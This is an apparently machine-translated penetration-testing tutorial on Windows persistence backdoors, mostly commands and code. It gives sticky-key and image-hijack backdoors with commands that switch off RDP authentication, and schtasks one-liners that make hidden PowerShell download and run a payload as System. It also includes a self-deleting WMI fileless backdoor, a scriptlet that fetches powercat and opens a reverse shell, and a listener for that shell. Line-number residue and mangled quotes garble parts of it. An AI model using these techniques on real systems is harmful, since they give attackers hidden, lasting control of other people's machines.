权限维持

1 操作系统后门

1.1 粘滞键后门

1.1.1 传统方法

Under windows/system32, directly replace the sethc program with cmd.exe

If the target machine is above Windows Vista, that is, the system that comes out later on Windows Vista, modifying sethc will prompt that trustedinstaller permission is required. trustedinstaller is a security mechanism, that is, the highest permissions of the system, which are higher than the administrator administrator.

Windows permissions are divided into three types from low to high, namely user, administrator, and system. Trustedinstaller is higher than administrator but not higher than system. The advantage of doing this is that it avoids the possibility of some malware modifying system files. The disadvantage is that it cannot operate directly by itself, so to modify sethc first, you need to change its owner to our current administrator user.

Before the owner, the permissions for editing directly are gray and cannot be modified. After having ownership, you can edit their permissions. You need to give yourself permissions, as shown in the figure below:

At this time, you can rename it or delete it directly, then copy cmd and modify sethc. Then, when there is no password on the lock screen, you can directly press shift to call up cmd and perform operations such as adding new users, as shown in the figure below:

1.1.2 新方法

The new method to set sticky key backdoor is implemented through the registry. The overall method idea is to implement it by modifying the registry's image hijacking and opening its remote desktop.

1

REG ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe' /v Debugger /t REG_SZ /d 'C:\windows\system32\cmd.exe'

命令说明: reg adds records to the registry, followed by the location of the registry. It should be noted here that HKLM is actually the abbreviation of HKEY_LOCAL_MACHINE. Image File Execution Option This directory is used to set up image hijacking. What to be hijacked is the sethc sticky key program in the command, and then the key name is specified through /v. This key name debugger is fixed, and then the type is specified through /t, that is, the REG_SZ string type, and finally the key value is specified through /d, that is, the program that was maliciously replaced, that is, our cmd.

After setting up the mirror hijacking, we have the effect of directly replacing the sethc program in our old method. However, for the convenience of using, we can enable the remote desktop of the target machine. Here we also set it through the registry, and we need to set two parameters.

1.1.2.1 关闭 RDP 用户鉴定选项

The first is to set the user authentication option of the remote desktop link to the off state, that is, the value is 0, and run the following command on the command line:

1

REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /v UserAuthentication /t REG_DWORD /d 0

User authentication means userauthentication function:

0 indicates whether user authentication is not required before remote desktop, or the default value is whether 1 indicates that user authentication is required before remote desktop. To better understand, let's take a look at their differences. Here is when userauthentication is 1:

When userauthentication is 1, user authentication is performed in front of the remote desktop. At this time, after entering the remote link, you will be required to enter the user name and password. If you enter the user name without entering the password, you will directly click on the connection and prompt for an authentication error. When userauthentication is 0, authentication will not be performed before connection. At this time, if you enter the username and do not enter the password, the connection will go directly to the lock screen of the remote desktop. So set to 0 we can go directly to the target's lock screen and then turn on cmd.

Note: The default is 0 on Windows Server 2012

1.1.2.2 更改 RDP 安全层设置

The second is to set the security layer of the remote desktop connection to 0, and run the following command on the command line:

1

REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /v SecurityLayer /t REG_DWORD /d 0

0 means using the RDP protocol for authentication before connection. RDP is a remote desktop connection, which can be simply understood as closing verification. 1 refers to the negotiation between the two ends of the connection to perform authentication, which is the default value. 2 is to use the tls protocol. Let’s take a look at the difference between 0 and 1:

When the userauthentication user authentication is 0, when the security layer of security layer is 1, click Connect and enter the user name and then click Connect to the target desktop. When the security layer is changed to 0, click Connect and it will directly go to the user's lock screen desktop, eliminating the step of entering credentials. So we set it to 0 and you can jump directly to the lock screen desktop to adjust cmd.

Note: The default is 1 on Windows Server 2012

1.1.3 测试结果

After testing, the msf session was immediately disconnected when the RDP connection was disconnected on win10, and was successful on windows server 2008.

1.2 注册表后门

Run: The key value under this item is the startup item

Location:

1

\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Commands under msf:

1

use exploit/windows/local/persistence

1.3 计划任务后门

schtasks

/Create Creates a new task.

/Delete Delete scheduled tasks.

/Query Displays all scheduled tasks.

/Change Changes scheduled task properties.

/Run Run scheduled tasks as needed.

/End Aborts the currently running scheduled task.

/ShowSid Displays the security identifier corresponding to the scheduled task name.

1

2

3

4

5

6

7

8

9

10

11

12

13

# schtasks command

# 03:30 timed execution every night

schtasks /create /tn 'TimedTask1' /tr C:\Users\Administrator\Desktop\TimedTask\Run.bat /sc DAILY /st 03:30

# statement A

# Query the created tasks

schtasks /query /tn TimedTask1 /v

# Run the created task immediately

schtasks /run /tn TimedTask1

# Delete the task

schtasks /delete /tn TimedTask1

1

2

3

4

5

6

7

8

9

10

11

12

13

14

#(X64) - On System Start

schtasks /create /tn PentestLab /tr 'c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'' /sc onstart /ru System

#(X64) - On User Idle (30mins)

schtasks /create /tn PentestLab /tr 'c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'' /sc onidle /i 30

#(X86) - On User Login

schtasks /create /tn PentestLab /tr 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'' /sc onlogon /ru System

#(X86) - On System Start

schtasks /create /tn PentestLab /tr 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'' /sc onstart /ru System

#(X86) - On User Idle (30mins)

schtasks /create /tn PentestLab /tr 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'' /sc onidle /i 30

1.4 wmi 无文件后门

evil3.vbs - Malicious VBS script. Create an event filter to capture the event where the account is successfully logged in; create an active script event consumer, and execute the remote script pnc.js after capturing the event; bind the filter and the consumer.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

nslink='winmgmts:\\.\root\subscription:'

qstr='select * from __InstanceCreationEvent within 5 ' 'Query "Instance Creation Event" every 5 seconds'

qstr=qstr'where targetinstance isa 'win32_NTLogEvent' and '

qstr=qstr'targetinstance.EventCode='4624' ' 'The instance name is win32_NTLogEvent'

set evtflt=getobject(nslink'__EventFilter').spawninstance_ 'Create event filter'

evtflt.name='filtP1' 'Define the name of the filter'

evtflt.EventNameSpace='root\cimv2'

evtflt.query=qstr 'Define query statement'

evtflt.querylanguage='wql' 'Define query language (can only be wql)'

set fltpath=evtflt.put_ 'Register filter, return its link'

set asec=getobject(nslink'ActiveScriptEventConsumer').spawninstance_ 'Create "ActiveScript Event Consumer"'

asec.name='consP1' 'Define the name of the consumer'

asec.scriptingengine='JScript' 'Define scripting language

asec.ScriptText='GetObject(''script:http://192.168.41.1:8080/pnc.js'')'

set asecpath=asec.put_ 'Register consumer, return their link'

set fcbnd=getobject(nslink'__FilterToConsumerBinding').spawninstance_ 'Create a binding between filter and consumer'

fcbnd.filter=fltpath.path 'Specify filter'

fcbnd.consumer=asecpath.path 'Specify Consumer'

fcbnd.put_ 'Execute binding'

dim fso

set fso=CreateObject('Scripting.FileSystemObject')

evilname=left(wscript.scriptfullname,instrrev(wscript.scriptfullname,'\'))

evilname=evilname fso.GetFile(Wscript.scriptfullname).name

fso.DeleteFile(evilname) 'vbs delete itself

pnc.js - Server-side malicious script. Download powercat.ps1 and use it to return the shell.

1

2

3

4

5

6

7

8

9

10

11

12

13

?xml version='1.0'?

package

component id='testCalc'

script language='JScript'

var r=new ActiveXObject('WScript.Shell').Run('powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.41.1:8080/powercat-master/powercat.ps1');powercat -c 192.168.41.1 -p 6999 -e cmd');

/script

/component

/package

shell_server.py - Server-side script to listen to shell.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

import socket

import re

pattern=re.compile(r'[A-Z]:\\.*?')

def recv_end(the_socket):

total_data=[]

data=b''

while True:

data=the_socket.recv(1024)

#print(data)

if not data:

raise ConnectionAbortedError

data=str(data, encoding='gbk')

total_data.append(data)

if pattern.search(data, re.M):

break

if len(total_data) 1:

last_pair=total_data[-2] + total_data[-1]

if pattern.search(last_pair, re.M):

break

return ''.join(total_data)

# Create a server

server=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

port=6999

server.bind(('192.168.41.1', port)) #Bind the port to be listened to

server.listen(5) #Start listening means that you can queue with five links

while True:# conn is a link instance generated on the server by linking the client over and

print('------------Listening on {}------------'.format(port))

conn, addr=server.accept() #Waiting for links, problems will arise when multiple links are found, and actually two values are returned

print(conn)

while True:

try:

se=input(recv_end(conn))

if not se:

se='\r\n'

#print(bytes(se, encoding='utf8'))

conn.send(bytes(se, encoding='utf-8')) # Then send the data

except BaseException as e:

print('\n' + addr[0] + ':' + str(addr[1]) + 'Close')

break

conn.close() # Close the connection

powercat.ps1 - powershell version netcat. (https://github.com/besimorhino/powercat)

clean.ps1 - Clear filters, consumers, and binders created by evil3.vbs.

1

2

3

4

5

6

7

8

#Filter

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter 'Name='filtP1'' | Remove-WmiObject -Verbose

#Consumer

Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter 'Name='consP1'' | Remove-WmiObject -Verbose

#Binding

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter '__Path LIKE '%filtP1%'' | Remove-WmiObject -Verbose

2 域控后门

2.1 DSRM 后门

DSRM (Directory Services Restore Mode) is a safe mode startup option for domain controllers in a Windows domain environment. Each domain controller has a本地管理员account (that is, a DSRM account). The purpose of DSRM is : The purpose of this is : The administrator allows the active directory database to be restored, repaired, and rebuilt the active directory database when the domain environment fails or crashes, so that the domain environment can run normally. In the early stages of domain environment creation, the password of DSRM needs to be set when DC is installed and rarely reset. The most basic way to modify the DSRM password is to run the ntdsutil line command on DC.

In penetration testing, you can use a DSRM account to persist the domain environment. If the system version of the domain controller is Windows Server 2008, you need to install the KB96132 patch to synchronize the DSRM password using the password of the specified domain account.